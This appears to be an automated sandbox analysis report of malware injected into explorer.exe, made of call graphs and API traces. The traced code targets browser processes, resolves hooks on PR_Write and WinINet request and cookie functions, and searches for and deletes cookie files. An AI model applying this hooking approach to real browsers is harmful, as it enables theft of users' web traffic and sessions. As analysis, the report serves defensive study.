                                                                                                                                                      control_flow_graph 329 8018f4-801917 CreateFileW 330 801919-801927 GetFileSize 329->330 331 80196d-80196f 329->331 332 801965-80196c CloseHandle 330->332 333 801929-80192b 330->333 332->331 333->332 334 80192d-801949 call 8029b7 ReadFile 333->334 337 80194b-801958 call 801c39 call 801972 334->337 338 80195d-801964 call 802999 334->338 337->338 338->332
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0080190C
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0080191C
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00801966
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00801941
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2517252058-0
                                                                                                                                                      • Opcode ID: fc1ca7a15a58de8d057d3b3a27f3be489282aaf53347892fc3ec8a285f84affd
                                                                                                                                                      • Instruction ID: d898efdd1f8111cb6a46bbc884d9e31840116619ae289c1e8bd935e860fc411a
                                                                                                                                                      • Opcode Fuzzy Hash: fc1ca7a15a58de8d057d3b3a27f3be489282aaf53347892fc3ec8a285f84affd
                                                                                                                                                      • Instruction Fuzzy Hash: 770149323012147BD6612B79DC5CE7F7E9DFB82BB4F010229F556E21E0DE209D058270

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:13.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:224
                                                                                                                                                      Total number of Limit Nodes:16
                                                                                                                                                      execution_graph 1590 1632f4 1592 163302 1590->1592 1591 16335f 1592->1591 1593 16332b RtlEnterCriticalSection 1592->1593 1594 163342 1593->1594 1599 16334e 1593->1599 1595 162faa 16 API calls 1594->1595 1597 163347 1595->1597 1596 163357 RtlLeaveCriticalSection 1596->1591 1598 162f1f 22 API calls 1597->1598 1598->1599 1599->1596 1385 163401 1386 163442 1385->1386 1387 16340a 1385->1387 1388 161274 VirtualQuery 1387->1388 1389 163412 1388->1389 1389->1386 1390 163416 RtlEnterCriticalSection 1389->1390 1395 163132 1390->1395 1396 1632e8 1395->1396 1397 16314d 1395->1397 1416 162f1f 1396->1416 1397->1396 1419 161000 GetProcessHeap RtlAllocateHeap 1397->1419 1399 1631cd 1420 161000 GetProcessHeap RtlAllocateHeap 1399->1420 1401 163212 1402 16322c lstrlen 1401->1402 1403 1632d8 1401->1403 1402->1403 1404 16323d 1402->1404 1405 161011 3 API calls 1403->1405 1406 161141 2 API calls 1404->1406 1407 1632df 1405->1407 1408 16324b 1406->1408 1409 161011 3 API calls 1407->1409 1408->1403 1421 161000 GetProcessHeap RtlAllocateHeap 1408->1421 1409->1396 1411 163260 1422 161000 GetProcessHeap RtlAllocateHeap 1411->1422 1413 16327f wsprintfA lstrcat 1423 161011 1413->1423 1415 1632b8 lstrcat lstrlen RtlMoveMemory 1415->1403 1417 162f23 CreateThread CloseHandle 1416->1417 1418 162f3c RtlLeaveCriticalSection 1416->1418 1417->1418 1428 162ed2 1417->1428 1418->1386 1419->1399 1420->1401 1421->1411 1422->1413 1424 161274 VirtualQuery 1423->1424 1425 161019 1424->1425 1426 16102d 1425->1426 1427 16101d GetProcessHeap HeapFree 1425->1427 1426->1415 1427->1426 1429 162f16 RtlExitUserThread 1428->1429 1430 162edd 1428->1430 1440 16178c lstrlen 1430->1440 1433 162f0e 1434 161011 3 API calls 1433->1434 1434->1429 1438 162f07 1439 161011 3 API calls 1438->1439 1439->1433 1441 1617a4 CryptBinaryToStringA 1440->1441 1442 1617d3 1440->1442 1441->1442 1443 1617b7 1441->1443 1442->1433 1446 161b1b 1442->1446 1458 161000 GetProcessHeap RtlAllocateHeap 1443->1458 1445 1617c2 CryptBinaryToStringA 1445->1442 1447 161b31 lstrlen 1446->1447 1448 161b3e 1446->1448 1447->1448 1459 161000 GetProcessHeap RtlAllocateHeap 1448->1459 1450 161b46 lstrcat 1451 161b82 1450->1451 1452 161b7b lstrcat 1450->1452 1460 16186c 1451->1460 1452->1451 1455 161011 3 API calls 1456 161ba5 1455->1456 1457 16105d VirtualFree 1456->1457 1457->1438 1458->1445 1459->1450 1483 161000 GetProcessHeap RtlAllocateHeap 1460->1483 1462 161890 1484 16106c lstrlen MultiByteToWideChar 1462->1484 1464 16189f 1485 1617dc RtlZeroMemory 1464->1485 1467 1618f1 RtlZeroMemory 1470 161926 1467->1470 1468 161011 3 API calls 1469 161b10 1468->1469 1469->1455 1471 161af3 1470->1471 1487 161000 GetProcessHeap RtlAllocateHeap 1470->1487 1471->1468 1473 1619e2 wsprintfW 1475 161a02 1473->1475 1474 161add 1476 161011 3 API calls 1474->1476 1475->1474 1488 161000 GetProcessHeap RtlAllocateHeap 1475->1488 1476->1471 1478 161ad6 1481 161011 3 API calls 1478->1481 1479 161a70 1479->1478 1489 16104c VirtualAlloc 1479->1489 1481->1474 1482 161ac6 RtlMoveMemory 1482->1478 1483->1462 1484->1464 1486 1617fe 1485->1486 1486->1467 1486->1471 1487->1473 1488->1479 1489->1482 1600 163371 1601 1633b2 1600->1601 1602 16337a 1600->1602 1603 161274 VirtualQuery 1602->1603 1604 163382 1603->1604 1604->1601 1605 163386 RtlEnterCriticalSection 1604->1605 1606 163132 13 API calls 1605->1606 1607 1633a3 1606->1607 1608 162f1f 22 API calls 1607->1608 1609 1633aa RtlLeaveCriticalSection 1608->1609 1609->1601 1490 162cce 1491 162cd7 1490->1491 1492 162d02 1491->1492 1493 162678 6 API calls 1491->1493 1493->1492 1494 162c8a 1495 162bf2 11 API calls 1494->1495 1496 162c9b 1495->1496 1497 162cc6 1496->1497 1498 162ca1 lstrlen 1496->1498 1499 162678 6 API calls 1498->1499 1500 162cbd 1499->1500 1502 16105d VirtualFree 1500->1502 1502->1497 1335 162c18 1336 162c2a 1335->1336 1337 162c82 1336->1337 1346 162bf2 1336->1346 1339 162c45 1339->1337 1351 161141 lstrlen lstrlen 1339->1351 1342 162c5d lstrlen 1353 162678 1342->1353 1343 162c79 1367 16105d VirtualFree 1343->1367 1368 16224c 1346->1368 1350 162c09 1350->1339 1352 161162 1351->1352 1352->1342 1352->1343 1354 162691 1353->1354 1355 162721 1353->1355 1354->1355 1381 161274 VirtualQuery 1354->1381 1355->1343 1358 162753 1383 161000 GetProcessHeap RtlAllocateHeap 1358->1383 1360 16279e 1365 1627ad 1360->1365 1384 161000 GetProcessHeap RtlAllocateHeap 1360->1384 1361 162768 memcpy 1361->1355 1362 1626e9 1364 162700 memcpy 1362->1364 1364->1355 1366 1627c7 memcpy 1365->1366 1366->1355 1367->1337 1379 161000 GetProcessHeap RtlAllocateHeap 1368->1379 1370 162254 1371 1623e3 1370->1371 1380 16104c VirtualAlloc 1371->1380 1373 162633 1373->1350 1374 1625b5 lstrcat lstrcat lstrcat lstrcat 1375 1623fc 1374->1375 1375->1373 1375->1374 1376 161011 GetProcessHeap HeapFree VirtualQuery 1375->1376 1377 162346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1375->1377 1378 16231f GetProcessHeap RtlAllocateHeap memcpy 1375->1378 1376->1375 1377->1375 1378->1375 1379->1370 1380->1375 1382 16128b 1381->1382 1382->1355 1382->1358 1382->1360 1382->1362 1383->1361 1384->1366 1503 163449 RtlEnterCriticalSection 1504 16346e 1503->1504 1529 1634ce 1503->1529 1505 1635bc RtlLeaveCriticalSection 1504->1505 1508 161274 VirtualQuery 1504->1508 1504->1529 1506 161274 VirtualQuery 1507 1634e9 1506->1507 1507->1505 1510 1635b1 1507->1510 1511 1634fd RtlZeroMemory 1507->1511 1509 163485 1508->1509 1513 161274 VirtualQuery 1509->1513 1509->1529 1510->1505 1572 162f3d 1511->1572 1515 163494 1513->1515 1517 163498 lstrcat 1515->1517 1515->1529 1516 163526 StrToIntA 1516->1505 1518 16353b 1516->1518 1536 162faa 1517->1536 1520 161141 2 API calls 1518->1520 1522 163549 1520->1522 1522->1505 1526 163595 1522->1526 1527 163558 1522->1527 1523 162f1f 22 API calls 1524 1634c3 1523->1524 1571 16105d VirtualFree 1524->1571 1530 162faa 16 API calls 1526->1530 1528 163574 1527->1528 1584 16105d VirtualFree 1527->1584 1585 16104c VirtualAlloc 1528->1585 1529->1505 1529->1506 1533 1635aa 1530->1533 1535 162f1f 22 API calls 1533->1535 1534 163585 RtlMoveMemory 1534->1505 1535->1510 1537 161141 2 API calls 1536->1537 1538 162fbf 1537->1538 1540 161141 2 API calls 1538->1540 1541 162fd1 1538->1541 1540->1541 1543 163129 1541->1543 1586 161000 GetProcessHeap RtlAllocateHeap 1541->1586 1542 162fe6 1587 161000 GetProcessHeap RtlAllocateHeap 1542->1587 1543->1523 1545 162ff1 RtlZeroMemory 1546 162f3d 3 API calls 1545->1546 1547 163013 1546->1547 1548 16301e StrToIntA 1547->1548 1549 163118 1547->1549 1548->1549 1550 163038 1548->1550 1551 161011 3 API calls 1549->1551 1552 162f3d 3 API calls 1550->1552 1553 163120 1551->1553 1555 163047 1552->1555 1554 161011 3 API calls 1553->1554 1554->1543 1555->1549 1556 163051 lstrlen 1555->1556 1557 162f3d 3 API calls 1556->1557 1558 163066 1557->1558 1559 161141 2 API calls 1558->1559 1560 163074 1559->1560 1560->1549 1588 161000 GetProcessHeap RtlAllocateHeap 1560->1588 1562 16308b 1563 162f3d 3 API calls 1562->1563 1564 1630a4 wsprintfA 1563->1564 1589 161000 GetProcessHeap RtlAllocateHeap 1564->1589 1566 1630cc 1567 162f3d 3 API calls 1566->1567 1568 1630dd lstrcat 1567->1568 1569 161011 3 API calls 1568->1569 1570 1630ee lstrcat lstrlen RtlMoveMemory 1569->1570 1570->1549 1571->1529 1573 162f61 1572->1573 1574 162f4b 1572->1574 1576 161141 2 API calls 1573->1576 1575 161141 2 API calls 1574->1575 1579 162f57 1575->1579 1577 162f66 1576->1577 1578 162fa4 1577->1578 1580 161141 2 API calls 1577->1580 1578->1505 1578->1516 1579->1578 1581 161141 2 API calls 1579->1581 1580->1579 1582 162f8e 1581->1582 1582->1578 1583 162f92 RtlMoveMemory 1582->1583 1583->1578 1584->1528 1585->1534 1586->1542 1587->1545 1588->1562 1589->1566

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph 0 Function_00169814 1 Function_00161011 38 Function_00161274 1->38 2 Function_00162F1F 82 Function_00162ED2 2->82 3 Function_0016231F 9 Function_00161000 3->9 4 Function_00161B1B 4->1 4->9 50 Function_0016186C 4->50 5 Function_00162E1B 5->1 5->9 6 Function_00162C18 25 Function_0016105D 6->25 32 Function_00161141 6->32 42 Function_00162678 6->42 91 Function_00162BF2 6->91 7 Function_00161305 8 Function_00168702 10 Function_00163401 10->2 17 Function_00163132 10->17 10->38 11 Function_00161C08 34 Function_0016104C 11->34 61 Function_00161C82 11->61 73 Function_00161BAF 11->73 83 Function_00161BD2 11->83 12 Function_00163709 12->1 12->9 46 Function_00161363 12->46 67 Function_001615BE 12->67 13 Function_00168A37 14 Function_00169337 15 Function_00165137 16 Function_00161235 17->1 17->9 17->32 18 Function_0016133F 19 Function_00162F3D 19->32 20 Function_00161320 21 Function_00169321 22 Function_00163829 22->12 72 Function_001636A1 22->72 81 Function_001635D4 22->81 23 Function_00169955 24 Function_0016285F 24->32 26 Function_00162659 27 Function_00162346 27->1 27->9 53 Function_00162296 27->53 28 Function_00161047 29 Function_00169844 30 Function_00162643 31 Function_00163840 33 Function_00161F4E 35 Function_00161E4C 36 Function_0016224C 36->9 37 Function_00163449 37->2 37->19 37->25 37->32 37->34 37->38 76 Function_00162FAA 37->76 39 Function_00162974 39->1 39->9 39->24 39->25 39->32 39->34 43 Function_00161765 39->43 74 Function_001628AD 39->74 40 Function_00168A71 41 Function_00163371 41->2 41->17 41->38 42->9 42->38 44 Function_00163862 44->1 44->7 44->9 44->11 44->16 44->20 44->22 44->32 44->38 47 Function_00161261 44->47 56 Function_00161090 44->56 59 Function_00162D9A 44->59 65 Function_0016118D 44->65 75 Function_001612AA 44->75 77 Function_00162EA8 44->77 86 Function_001616C7 44->86 97 Function_00161FE5 44->97 45 Function_00169763 46->18 48 Function_00162B6E 48->1 48->4 48->25 48->39 48->48 63 Function_0016178C 48->63 94 Function_001627E7 48->94 49 Function_0016106C 50->1 50->9 50->34 50->49 50->56 84 Function_001617DC 50->84 51 Function_0016926D 52 Function_0016966A 54 Function_00162295 55 Function_00168F93 57 Function_00168A9F 58 Function_0016929C 60 Function_00165198 96 Function_00161CE5 61->96 62 Function_00168B81 63->9 64 Function_00163D8D 64->9 64->38 64->44 64->64 99 Function_00163BE1 64->99 66 Function_00162C8A 66->25 66->42 66->91 67->1 67->9 67->67 78 Function_001615A9 67->78 68 Function_001633B9 68->2 68->17 68->38 69 Function_00161CA5 69->96 70 Function_001623A2 71 Function_001650A0 72->1 72->9 72->46 85 Function_001614D8 72->85 74->32 76->1 76->9 76->19 76->32 77->5 79 Function_001613D7 80 Function_001693D4 81->1 81->9 81->46 81->85 82->1 82->4 82->25 82->63 83->69 85->1 85->9 85->79 92 Function_001613FE 85->92 87 Function_00168CC3 88 Function_001687CE 89 Function_00162CCE 89->42 90 Function_001632F4 90->2 90->76 91->36 98 Function_001623E3 91->98 92->1 92->9 92->79 92->85 93 Function_001689F9 94->1 94->38 95 Function_001695E5 97->33 97->35 97->38 98->1 98->3 98->27 98->34 98->70 99->7 99->9 99->16 99->20 99->22 99->32 99->38 99->47 99->56 99->75 99->77 99->97 100 Function_00168EEF

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00163862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334libraryloaderstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 163862-1638de call 161000 GetModuleFileNameA call 161000 GetCurrentProcessId wsprintfA call 16118d CreateMutexA GetLastError 7 1638e4-163940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 161000 Sleep lstrcmpiA 0->7 8 163bc5-163c3a call 161011 * 2 RtlExitUserThread call 161000 * 2 wsprintfA call 161235 0->8 14 163946-163961 GetCommandLineW CommandLineToArgvW 7->14 15 163a0a-163a14 lstrcmpiA 7->15 70 163c5e 8->70 71 163c3c-163c4c call 161141 8->71 19 163967-16398b call 1616c7 GetModuleHandleA GetProcAddress 14->19 20 163bc3-163bc4 14->20 17 163b14-163b39 call 1616c7 GetModuleHandleA GetProcAddress 15->17 18 163a1a-163a24 lstrcmpiA 15->18 32 163b4c-163b59 GetModuleHandleA GetProcAddress 17->32 33 163b3b-163b47 call 161c08 17->33 18->17 23 163a2a-163a40 lstrcmpiA 18->23 30 16399e-1639c0 GetModuleHandleA GetProcAddress 19->30 31 16398d-163999 call 161c08 19->31 20->8 28 163a67-163a71 lstrcmpiA 23->28 29 163a42-163a4e GetCommandLineA StrStrIA 23->29 36 163a73-163a7f GetCommandLineA StrStrIA 28->36 37 163a88-163a92 lstrcmpiA 28->37 29->28 35 163a50 29->35 41 1639d6-1639e8 GetModuleHandleA GetProcAddress 30->41 42 1639c2-1639d0 GetModuleHandleA GetProcAddress 30->42 31->30 44 163b6c-163b79 GetModuleHandleA GetProcAddress 32->44 45 163b5b-163b67 call 161c08 32->45 33->32 47 163a55-163a65 GetModuleHandleA 35->47 36->37 38 163a81-163a86 36->38 37->20 40 163a98-163aa4 GetCommandLineA StrStrIA 37->40 38->47 40->20 48 163aaa-163ac5 GetModuleHandleA 40->48 50 1639ea-1639f3 GetModuleHandleA GetProcAddress 41->50 51 1639f9-163a05 41->51 42->41 49 163b08-163b0f call 1616c7 42->49 54 163b8c-163bbe call 1616c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 44->54 55 163b7b-163b87 call 161c08 44->55 45->44 56 163ace-163ad2 47->56 59 163ac7-163acc GetModuleHandleA 48->59 60 163ad8-163aea call 1616c7 call 162d9a 48->60 49->20 50->49 50->51 61 163b03 call 161c08 51->61 54->20 55->54 56->20 56->60 59->56 60->49 82 163aec-163af5 call 161274 60->82 61->49 73 163c64-163c74 CreateToolhelp32Snapshot 70->73 79 163c53-163c59 call 161261 71->79 80 163c4e call 163829 71->80 76 163d7d-163d88 Sleep 73->76 77 163c7a-163c8e Process32First 73->77 76->73 81 163d6e-163d70 77->81 79->70 80->79 85 163d76-163d77 CloseHandle 81->85 86 163c93-163ca5 lstrcmpiA 81->86 82->49 93 163af7-163b01 82->93 85->76 88 163ca7-163cb5 lstrcmpiA 86->88 89 163cda-163ce3 call 1612aa 86->89 88->89 92 163cb7-163cc5 lstrcmpiA 88->92 96 163ce5-163cee call 161305 89->96 97 163d62-163d68 Process32Next 89->97 92->89 95 163cc7-163cd4 call 162ea8 92->95 93->61 95->89 95->97 96->97 102 163cf0-163cf7 call 161320 96->102 97->81 102->97 105 163cf9-163d06 call 161274 102->105 105->97 108 163d08-163d5d lstrcmpiA call 161090 call 161fe5 call 161090 105->108 108->97
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00163886
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000001), ref: 0016389B
                                                                                                                                                      • wsprintfA.USER32 ref: 001638B6
                                                                                                                                                        • Part of subcall function 0016118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001611A9
                                                                                                                                                        • Part of subcall function 0016118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001611C1
                                                                                                                                                        • Part of subcall function 0016118D: lstrlen.KERNEL32(?,00000000), ref: 001611C9
                                                                                                                                                        • Part of subcall function 0016118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001611D4
                                                                                                                                                        • Part of subcall function 0016118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001611EE
                                                                                                                                                        • Part of subcall function 0016118D: wsprintfA.USER32 ref: 00161205
                                                                                                                                                        • Part of subcall function 0016118D: CryptDestroyHash.ADVAPI32(?), ref: 0016121E
                                                                                                                                                        • Part of subcall function 0016118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00161228
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001638CD
                                                                                                                                                      • GetLastError.KERNEL32 ref: 001638D3
                                                                                                                                                      • RtlInitializeCriticalSection.NTDLL(00166038), ref: 001638F3
                                                                                                                                                      • PathFindFileNameA.SHLWAPI(?), ref: 001638FA
                                                                                                                                                      • lstrcat.KERNEL32(00165CDE,00000000), ref: 00163910
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0016392A
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0016393C
                                                                                                                                                      • GetCommandLineW.KERNEL32(?), ref: 0016394F
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0016397E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163987
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 001639AF
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639B2
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 001639C4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639C7
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 001639E1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639E4
                                                                                                                                                      • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 001639EC
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001639EF
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 00163A6D
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A78
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163A7B
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 00163A8E
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A9D
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163AA0
                                                                                                                                                      • GetModuleHandleA.KERNEL32(opera.dll), ref: 00163ABF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00163ACC
                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 00163956
                                                                                                                                                        • Part of subcall function 001616C7: GetCurrentProcessId.KERNEL32 ref: 001616D9
                                                                                                                                                        • Part of subcall function 001616C7: GetCurrentThreadId.KERNEL32 ref: 001616E1
                                                                                                                                                        • Part of subcall function 001616C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001616F1
                                                                                                                                                        • Part of subcall function 001616C7: Thread32First.KERNEL32(00000000,0000001C), ref: 001616FF
                                                                                                                                                        • Part of subcall function 001616C7: CloseHandle.KERNEL32(00000000), ref: 00161758
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 00163A10
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 00163A20
                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 00163A30
                                                                                                                                                      • GetCommandLineA.KERNEL32(NetworkService), ref: 00163A47
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000), ref: 00163A4A
                                                                                                                                                      • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00163A5F
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00163B2C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B35
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00163B52
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B55
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00163B72
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B75
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00163B99
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163B9C
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00163BA9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163BAC
                                                                                                                                                      • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00163BB9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00163BBC
                                                                                                                                                        • Part of subcall function 00161C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00161C42
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00163BD9
                                                                                                                                                      • wsprintfA.USER32 ref: 00163C1F
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00163C69
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00163C88
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00163D77
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00163D82
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                                                                                                                                      • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                                                                                                                                      • API String ID: 2480436012-2618538661
                                                                                                                                                      • Opcode ID: 000d34ac2aeb7e00b67d375bb3fa28afa5e1288e387f66371c82575c515f0d4b
                                                                                                                                                      • Instruction ID: 34cd383b32285c1464047a5b56a655c396b7f513a827c11256a604d037c3124a
                                                                                                                                                      • Opcode Fuzzy Hash: 000d34ac2aeb7e00b67d375bb3fa28afa5e1288e387f66371c82575c515f0d4b
                                                                                                                                                      • Instruction Fuzzy Hash: 9BA13571A40325BBDB107BB59C09E2F3A9C9F52B42B050528F911E3291DFB5CD61CAB1
                                                                                                                                                      Function 001615BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87filestringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*,771EF770,00000000,76B2B2E0,777783D0), ref: 001615EB
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 001615F7
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,001641C8), ref: 00161623
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,001641CC), ref: 00161633
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0016164C
                                                                                                                                                      • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00161661
                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,?), ref: 0016167E
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0016169C
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 001616AB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                                                                                                                                      • String ID: *.*$Cookies*
                                                                                                                                                      • API String ID: 4256701249-3228320225
                                                                                                                                                      • Opcode ID: a71e2d21f9ff80f7b665c04f10f50ea67942b69a84b170dc39b502cd7ff53dab
                                                                                                                                                      • Instruction ID: a4457f689ebaa00f72919407fe9f25c02890b99f89bd9c2a11399014afbdb9aa
                                                                                                                                                      • Opcode Fuzzy Hash: a71e2d21f9ff80f7b665c04f10f50ea67942b69a84b170dc39b502cd7ff53dab
                                                                                                                                                      • Instruction Fuzzy Hash: C421B4712043556BD700AF60DC45A7F7BECEB9A382F080529F941D3241DBB8DD9487A2
                                                                                                                                                      Function 001614D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001613FE: wsprintfW.USER32 ref: 0016142A
                                                                                                                                                        • Part of subcall function 001613FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00161439
                                                                                                                                                        • Part of subcall function 001613FE: wsprintfW.USER32 ref: 00161476
                                                                                                                                                        • Part of subcall function 001613FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0016149C
                                                                                                                                                        • Part of subcall function 001613FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001614AF
                                                                                                                                                        • Part of subcall function 001613FE: FindClose.KERNELBASE(00000000), ref: 001614BA
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfW.USER32 ref: 0016150D
